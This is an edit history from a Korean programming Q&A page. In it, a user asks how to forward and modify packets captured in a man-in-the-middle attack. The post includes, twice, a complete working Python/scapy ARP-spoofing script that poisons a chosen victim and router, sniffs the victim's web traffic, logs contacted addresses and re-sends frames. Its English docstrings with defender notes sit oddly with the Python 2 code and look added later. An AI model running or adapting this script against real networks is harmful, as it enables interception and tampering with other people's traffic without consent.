편집 기록
  • 정영훈님의 편집
    날짜: 2018.06.21

    python 중간자 공격에 따른 패킷 포워딩 구현


    현재 파이썬으로 중간자 공격을 해보려고 합니다

    중간자 공격을 해서 패킷을 훔치는 것까지는 성공했는데, 받은 패킷을 원래의 주소로 넘겨주는 방법을 잘 모르겠습니다.

    물론 운영체제에서 지원하는 기능을 사용하면 된다는 것은 알고 있습니다(예: sudo sysctl -w net.inet.ip.forwarding=1). 그러나 운영체제의 도움을 받으면 패킷을 수정해서 보낼 수 없었습니다.

    저는 받은 패킷을 수정해서 보내주고 싶습니다. 어떻게 하면 구현할 수 있을까요?

    혹시 도움이 되시라고 소스코드도 올리도록 하겠습니다

    import subprocess
    import os
    import scapy.all
    import time
    import sys
    import threading
    
    # Module-level state read by pr(): main() overwrites victim_ip with the
    # address typed at the prompt, and the __main__ block reloads ips from test.txt.
    victim_ip = '0'
    # Peer addresses already written to test.txt, kept so each is logged only once.
    ips = list()
    
    def select_victim():
        """Prompt on stdin for the two addresses the script operates on.

        Returns:
            A ``(victim_ip, router_ip)`` tuple holding the strings exactly as
            typed; nothing checks that either one is a well-formed IPv4 address.
        """
        answers = [raw_input(prompt) for prompt in ('Input victim IP', 'Input router IP')]
        return tuple(answers)
    
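    def getMac(host):
        """Look up the MAC address the local ARP cache holds for *host*.

        Runs ``arp -a`` and scans its output, assuming the layout
        ``name (ip) at mac ...`` so that the second space-separated field is the
        parenthesised IP and the fourth is the hardware address.

        Args:
            host: IPv4 address as a string.

        Returns:
            The fourth field of the first matching line, or None when no line
            matches. The value is returned as printed by ``arp`` and is not
            validated as a MAC address.
        """
        proc = subprocess.Popen(["arp", "-a"], stdout=subprocess.PIPE,
                                universal_newlines=True)
        # communicate() drains the pipe and reaps the child, so repeated calls
        # do not leave un-waited processes and open pipes behind.
        output = proc.communicate()[0]
        for line in output.split('\n'):
            fields = line.split(' ')
            if len(fields) < 4:
                # Blank or unexpected line: skip it instead of raising IndexError.
                continue
            # Compare the whole address. A substring test would let, for example,
            # "192.168.0.1" match the cache entry for "(192.168.0.10)" as well.
            if fields[1].strip('()') == host:
                return fields[3]
        return None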
    
    def attack(victim_ip, router_ip):
        """Send one forged ARP reply to the victim and one to the router.

        Both packets are ARP replies (``op=2``) addressed to the receiver's MAC as
        found by getMac(). ``psrc`` carries the *other* host's IP and ``hwsrc`` is
        not set, so scapy supplies its default sender address (normally the MAC of
        the sending interface).

        Defender's view: a reply nobody asked for that re-binds the gateway's IP
        to a different MAC is what ARP monitors such as arpwatch report, and what
        Dynamic ARP Inspection on the switch or static ARP entries on the hosts
        are meant to stop.
        """
        # (receiver IP, IP claimed as sender, receiver MAC); lookups run in the
        # same order as before: victim first, then router.
        replies = (
            (victim_ip, router_ip, getMac(victim_ip)),
            (router_ip, victim_ip, getMac(router_ip)),
        )
        for receiver_ip, claimed_ip, receiver_mac in replies:
            scapy.all.send(scapy.all.ARP(op=2, pdst=receiver_ip, psrc=claimed_ip, hwdst=receiver_mac))
    
    def recover(victim_ip, router_ip):
        """Re-announce the real IP-to-MAC binding of both hosts, three times each.

        Each packet is an ARP reply (``op=2``) with ``hwdst`` set to the broadcast
        address and ``hwsrc`` set to the MAC that getMac() returns for the host
        named in ``psrc``.

        NOTE(review): if getMac() returns None for a host, ``hwsrc`` is passed as
        None and scapy presumably falls back to its default sender address, which
        would not restore that host's real binding -- confirm and guard.
        """
        broadcast = "ff:ff:ff:ff:ff:ff"
        mac_of_victim = getMac(victim_ip)
        mac_of_router = getMac(router_ip)
        to_router = scapy.all.ARP(op=2, pdst=router_ip, psrc=victim_ip,
                                  hwdst=broadcast, hwsrc=mac_of_victim)
        to_victim = scapy.all.ARP(op=2, pdst=victim_ip, psrc=router_ip,
                                  hwdst=broadcast, hwsrc=mac_of_router)
        for corrective in (to_router, to_victim):
            scapy.all.send(corrective, count=3)
    
    def pr(x):
        """Per-packet callback handed to scapy's sniff() by sniffing().

        For every captured packet it prints victim_ip, opens test.txt in append
        mode, and -- for TCP traffic on port 80 or 443 whose IP source or
        destination equals victim_ip -- records the other endpoint's address in
        test.txt and in the global ``ips`` list, once per address. Every packet,
        matching or not, is then re-emitted as captured on interface 'en0'.

        Defender's view: only addresses are logged here, which shows that an
        on-path host learns which servers a client contacts even when the
        port-443 payload itself is presumably TLS-protected.

        Args:
            x: the packet object passed in by sniff().
        """
        try:
            global victim_ip
            global ips
            print victim_ip
            # The log file is reopened for each packet; 'at' creates it if missing.
            with open('test.txt', 'at') as f:
                if x.haslayer(scapy.all.TCP):
                    # Either side on 80/443, i.e. requests and responses alike.
                    if x['TCP'].sport == 80 or x['TCP'].dport == 80 or x['TCP'].sport == 443 or x['TCP'].dport == 443:
                        # Outbound from the victim: log a destination not seen before.
                        if x['IP'].src == victim_ip and not(str(x['IP'].dst) in ips):
                            f.write(str(x['IP'].dst)+' ')
                            ips.append(str(x['IP'].dst))
                        # Inbound to the victim: log a new source and dump the packet.
                        elif x['IP'].dst == victim_ip and not (str(x['IP'].src) in ips):
                            f.write(str(x['IP'].src)+' ')
                            ips.append(str(x['IP'].src))
                            x.show()
    
                # Runs for every packet: the frame is sent back out unchanged on the
                # hard-coded interface name.
                scapy.all.sendp(x, iface='en0')
        # Any failure (e.g. x['IP'] on a TCP packet without an IP layer) is printed
        # and swallowed, which also skips the sendp() call for that packet.
        except Exception, err:
            print err
            pass
    
    def sniffing():
        """Thread target: capture packets with scapy and pass each one to pr().

        sniff() is given no interface, filter, count or timeout, so scapy's
        defaults apply to all of them; the call presumably runs until interrupted.
        """
        capture = scapy.all.sniff
        capture(prn=pr)
    
    def main():
        """Prompt for the two addresses, start the sniffer thread, and send ARP replies every 2 s.

        Steps: read the addresses via select_victim(), publish the victim address
        in the global ``victim_ip`` for pr(), return early if getMac() cannot
        resolve either host, start sniffing() in a thread, then call attack() in
        an endless loop with a 2-second sleep.

        Defender's view: unsolicited ARP replies arriving at a fixed 2-second
        cadence are a recognisable pattern for ARP monitoring on the segment.

        NOTE(review): ``except Exception`` does not catch KeyboardInterrupt (it
        derives from BaseException), so stopping the script with Ctrl-C skips
        recover(); both hosts then keep the forged binding until their ARP cache
        entries are refreshed or expire.

        NOTE(review): the sniffer thread is not a daemon and sniffing() passes no
        stop condition to sniff(), so ``t.join(10)`` presumably times out and the
        interpreter keeps waiting for that thread after exit() -- confirm.
        """
        # NOTE(review): the privilege check is disabled; os and sys are otherwise
        # unused in this file.
        #if os.geteuid() != 0:
        #    sys.exit("[!] Please run as root")
        IP=select_victim()
        global victim_ip
        victim_ip=IP[0]
        router_ip=IP[1]
    
        # Both MACs must already be in the local ARP cache, since getMac() only
        # reads `arp -a` and never triggers resolution itself.
        if getMac(router_ip) == None:
            print 'We can not find router mac address'
            return
    
        if getMac(victim_ip) == None:
            print 'we can not find victim mac address'
            return
    
        # Packet capture runs concurrently with the send loop below.
        t=threading.Thread(target=sniffing)
        t.start()
    
    
        try:
            while True:
                print 'a'
                attack(victim_ip, router_ip)
                time.sleep(2)
        # Only reached for Exception subclasses raised inside the loop.
        except Exception, err:
            print err
            recover(victim_ip, router_ip)
            t.join(10)
            exit()
    
    
    
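    if __name__ == '__main__':
        # Reload the peer addresses recorded by earlier runs so pr() does not log
        # them again. On a first run test.txt does not exist yet (pr() only creates
        # it later, in append mode), so a missing file means "nothing seen so far".
        try:
            with open('test.txt', 'rt') as f:
                # split() without arguments also drops the empty string that the
                # trailing ' ' separator would otherwise leave in the list.
                ips = f.read().split()
        except IOError:
            ips = []
        main()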
    
    
  • Damotorie님의 편집
    날짜: 2016.08.29

    python 중간자 공격에 따른 패킷 포워딩 구현


    현재 파이썬으로 중간자 공격을 해보려고 합니다

    중간자 공격을 해서 패킷을 훔치는 것까지는 성공했는데, 받은 패킷을 원래의 주소로 넘겨주는 방법을 잘 모르겠습니다.

    물론 운영체제에서 지원하는 기능을 사용하면 된다는 것은 알고 있습니다(예: sudo sysctl -w net.inet.ip.forwarding=1). 그러나 운영체제의 도움을 받으면 패킷을 수정해서 보낼 수 없었습니다.

    저는 받은 패킷을 수정해서 보내주고 싶습니다. 어떻게 하면 구현할 수 있을까요?

    혹시 도움이 되시라고 소스코드도 올리도록 하겠습니다

    import subprocess
    import os
    import scapy.all
    import time
    import sys
    import threading
    
    # Module-level state read by pr(): main() overwrites victim_ip with the
    # address typed at the prompt, and the __main__ block reloads ips from test.txt.
    victim_ip = '0'
    # Peer addresses already written to test.txt, kept so each is logged only once.
    ips = list()
    
    def select_victim():
        """Prompt on stdin for the two addresses the script operates on.

        Returns:
            A ``(victim_ip, router_ip)`` tuple holding the strings exactly as
            typed; nothing checks that either one is a well-formed IPv4 address.
        """
        answers = [raw_input(prompt) for prompt in ('Input victim IP', 'Input router IP')]
        return tuple(answers)
    
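    def getMac(host):
        """Look up the MAC address the local ARP cache holds for *host*.

        Runs ``arp -a`` and scans its output, assuming the layout
        ``name (ip) at mac ...`` so that the second space-separated field is the
        parenthesised IP and the fourth is the hardware address.

        Args:
            host: IPv4 address as a string.

        Returns:
            The fourth field of the first matching line, or None when no line
            matches. The value is returned as printed by ``arp`` and is not
            validated as a MAC address.
        """
        proc = subprocess.Popen(["arp", "-a"], stdout=subprocess.PIPE,
                                universal_newlines=True)
        # communicate() drains the pipe and reaps the child, so repeated calls
        # do not leave un-waited processes and open pipes behind.
        output = proc.communicate()[0]
        for line in output.split('\n'):
            fields = line.split(' ')
            if len(fields) < 4:
                # Blank or unexpected line: skip it instead of raising IndexError.
                continue
            # Compare the whole address. A substring test would let, for example,
            # "192.168.0.1" match the cache entry for "(192.168.0.10)" as well.
            if fields[1].strip('()') == host:
                return fields[3]
        return None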
    
    def attack(victim_ip, router_ip):
        """Send one forged ARP reply to the victim and one to the router.

        Both packets are ARP replies (``op=2``) addressed to the receiver's MAC as
        found by getMac(). ``psrc`` carries the *other* host's IP and ``hwsrc`` is
        not set, so scapy supplies its default sender address (normally the MAC of
        the sending interface).

        Defender's view: a reply nobody asked for that re-binds the gateway's IP
        to a different MAC is what ARP monitors such as arpwatch report, and what
        Dynamic ARP Inspection on the switch or static ARP entries on the hosts
        are meant to stop.
        """
        # (receiver IP, IP claimed as sender, receiver MAC); lookups run in the
        # same order as before: victim first, then router.
        replies = (
            (victim_ip, router_ip, getMac(victim_ip)),
            (router_ip, victim_ip, getMac(router_ip)),
        )
        for receiver_ip, claimed_ip, receiver_mac in replies:
            scapy.all.send(scapy.all.ARP(op=2, pdst=receiver_ip, psrc=claimed_ip, hwdst=receiver_mac))
    
    def recover(victim_ip, router_ip):
        """Re-announce the real IP-to-MAC binding of both hosts, three times each.

        Each packet is an ARP reply (``op=2``) with ``hwdst`` set to the broadcast
        address and ``hwsrc`` set to the MAC that getMac() returns for the host
        named in ``psrc``.

        NOTE(review): if getMac() returns None for a host, ``hwsrc`` is passed as
        None and scapy presumably falls back to its default sender address, which
        would not restore that host's real binding -- confirm and guard.
        """
        broadcast = "ff:ff:ff:ff:ff:ff"
        mac_of_victim = getMac(victim_ip)
        mac_of_router = getMac(router_ip)
        to_router = scapy.all.ARP(op=2, pdst=router_ip, psrc=victim_ip,
                                  hwdst=broadcast, hwsrc=mac_of_victim)
        to_victim = scapy.all.ARP(op=2, pdst=victim_ip, psrc=router_ip,
                                  hwdst=broadcast, hwsrc=mac_of_router)
        for corrective in (to_router, to_victim):
            scapy.all.send(corrective, count=3)
    
    def pr(x):
        """Per-packet callback handed to scapy's sniff() by sniffing().

        For every captured packet it prints victim_ip, opens test.txt in append
        mode, and -- for TCP traffic on port 80 or 443 whose IP source or
        destination equals victim_ip -- records the other endpoint's address in
        test.txt and in the global ``ips`` list, once per address. Every packet,
        matching or not, is then re-emitted as captured on interface 'en0'.

        Defender's view: only addresses are logged here, which shows that an
        on-path host learns which servers a client contacts even when the
        port-443 payload itself is presumably TLS-protected.

        Args:
            x: the packet object passed in by sniff().
        """
        try:
            global victim_ip
            global ips
            print victim_ip
            # The log file is reopened for each packet; 'at' creates it if missing.
            with open('test.txt', 'at') as f:
                if x.haslayer(scapy.all.TCP):
                    # Either side on 80/443, i.e. requests and responses alike.
                    if x['TCP'].sport == 80 or x['TCP'].dport == 80 or x['TCP'].sport == 443 or x['TCP'].dport == 443:
                        # Outbound from the victim: log a destination not seen before.
                        if x['IP'].src == victim_ip and not(str(x['IP'].dst) in ips):
                            f.write(str(x['IP'].dst)+' ')
                            ips.append(str(x['IP'].dst))
                        # Inbound to the victim: log a new source and dump the packet.
                        elif x['IP'].dst == victim_ip and not (str(x['IP'].src) in ips):
                            f.write(str(x['IP'].src)+' ')
                            ips.append(str(x['IP'].src))
                            x.show()
    
                # Runs for every packet: the frame is sent back out unchanged on the
                # hard-coded interface name.
                scapy.all.sendp(x, iface='en0')
        # Any failure (e.g. x['IP'] on a TCP packet without an IP layer) is printed
        # and swallowed, which also skips the sendp() call for that packet.
        except Exception, err:
            print err
            pass
    
    def sniffing():
        """Thread target: capture packets with scapy and pass each one to pr().

        sniff() is given no interface, filter, count or timeout, so scapy's
        defaults apply to all of them; the call presumably runs until interrupted.
        """
        capture = scapy.all.sniff
        capture(prn=pr)
    
    def main():
        """Prompt for the two addresses, start the sniffer thread, and send ARP replies every 2 s.

        Steps: read the addresses via select_victim(), publish the victim address
        in the global ``victim_ip`` for pr(), return early if getMac() cannot
        resolve either host, start sniffing() in a thread, then call attack() in
        an endless loop with a 2-second sleep.

        Defender's view: unsolicited ARP replies arriving at a fixed 2-second
        cadence are a recognisable pattern for ARP monitoring on the segment.

        NOTE(review): ``except Exception`` does not catch KeyboardInterrupt (it
        derives from BaseException), so stopping the script with Ctrl-C skips
        recover(); both hosts then keep the forged binding until their ARP cache
        entries are refreshed or expire.

        NOTE(review): the sniffer thread is not a daemon and sniffing() passes no
        stop condition to sniff(), so ``t.join(10)`` presumably times out and the
        interpreter keeps waiting for that thread after exit() -- confirm.
        """
        # NOTE(review): the privilege check is disabled; os and sys are otherwise
        # unused in this file.
        #if os.geteuid() != 0:
        #    sys.exit("[!] Please run as root")
        IP=select_victim()
        global victim_ip
        victim_ip=IP[0]
        router_ip=IP[1]
    
        # Both MACs must already be in the local ARP cache, since getMac() only
        # reads `arp -a` and never triggers resolution itself.
        if getMac(router_ip) == None:
            print 'We can not find router mac address'
            return
    
        if getMac(victim_ip) == None:
            print 'we can not find victim mac address'
            return
    
        # Packet capture runs concurrently with the send loop below.
        t=threading.Thread(target=sniffing)
        t.start()
    
    
        try:
            while True:
                print 'a'
                attack(victim_ip, router_ip)
                time.sleep(2)
        # Only reached for Exception subclasses raised inside the loop.
        except Exception, err:
            print err
            recover(victim_ip, router_ip)
            t.join(10)
            exit()
    
    
    
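    if __name__ == '__main__':
        # Reload the peer addresses recorded by earlier runs so pr() does not log
        # them again. On a first run test.txt does not exist yet (pr() only creates
        # it later, in append mode), so a missing file means "nothing seen so far".
        try:
            with open('test.txt', 'rt') as f:
                # split() without arguments also drops the empty string that the
                # trailing ' ' separator would otherwise leave in the list.
                ips = f.read().split()
        except IOError:
            ips = []
        main()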